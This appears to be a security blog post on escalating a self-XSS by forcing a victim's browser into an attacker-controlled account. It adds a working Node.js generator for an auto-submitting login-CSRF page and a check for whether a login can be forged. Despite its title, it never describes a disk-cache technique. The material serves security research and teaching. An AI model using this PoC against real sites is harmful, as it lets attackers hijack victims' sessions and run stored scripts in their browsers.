Exploiting Self-XSS Using Disk Cache
Think about a situation where you have a self-XSS and you can’t do anything with it — What would your next move be?
slonser has a great write-up that explains everything about exploiting self-XSS, so I won’t repeat those details here. Instead, I’ll focus on one interesting technique.
One way to exploit a self-XSS is to force the victim to log in to an account you control, so that the payload stored in that account runs in the victim's browser.
Maybe you think the only way to do this is through a login CSRF. If so, you're wrong.
There are several other ways to achieve the same thing: forgot-password flows, magic links, user invite links, and so on. Anything that lets you hand the victim a link that establishes a session as your account will do.
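As an added illustration (not code from the original post or from slonser's write-up), the following Node.js snippet builds the login-CSRF page described above and includes a small pre-check for whether a captured login request is even replayable cross-origin. The endpoint `https://target.example/login`, the field names `username`/`password`, and the account credentials are assumptions; the heuristic in `loginLooksCsrfable` is a rough screen, not a proof.

```javascript
// Added example, not part of the original post.
// Builds a page that silently logs the victim into an attacker-controlled
// account, so a self-XSS stored in that account fires in the victim's browser.
// Assumptions (hypothetical): the target's login is a plain POST with
// "username" and "password" fields and no anti-CSRF token.

function escapeHtml(s) {
  // Escape attacker-chosen values so they cannot break out of the attribute
  // we place them in (the PoC itself should not be the injection point).
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function buildLoginCsrfPage(action, fields) {
  // One hidden input per form field, then auto-submit on load.
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `<input type="hidden" name="${escapeHtml(name)}" value="${escapeHtml(value)}">`)
    .join("\n    ");
  return `<!doctype html>
<html><body>
  <form id="f" method="POST" action="${escapeHtml(action)}">
    ${inputs}
  </form>
  <script>document.getElementById("f").submit();</script>
</body></html>`;
}

function loginLooksCsrfable(formFieldNames, requestHeaders) {
  // Heuristic: a login request that carries a CSRF token field, a custom
  // X- header, or an Authorization header cannot be replayed by a plain HTML
  // form from another origin. SameSite cookies do not block this attack, since
  // the session cookie is *set* by the login response, not sent with the
  // forged request.
  const tokenish = /csrf|xsrf|token|nonce|authenticity/i;
  if (formFieldNames.some((n) => tokenish.test(n))) return false;
  const blockingHeader = Object.keys(requestHeaders).some(
    (h) => /^x-/i.test(h) || /^authorization$/i.test(h)
  );
  return !blockingHeader;
}

// Constructed sample: a captured login request with no token (hypothetical).
const capturedFields = ["username", "password"];
const capturedHeaders = { "content-type": "application/x-www-form-urlencoded" };

if (loginLooksCsrfable(capturedFields, capturedHeaders)) {
  const page = buildLoginCsrfPage("https://target.example/login", {
    username: "attacker-account",
    password: "attacker-password",
  });
  console.log(page);
}

module.exports = { escapeHtml, buildLoginCsrfPage, loginLooksCsrfable };
```

If the login form does carry a CSRF token, this page gets you nothing, which is exactly why the alternatives listed above (forgot-password, magic link, invite link) matter: they typically complete the login via a GET that the victim can be sent directly.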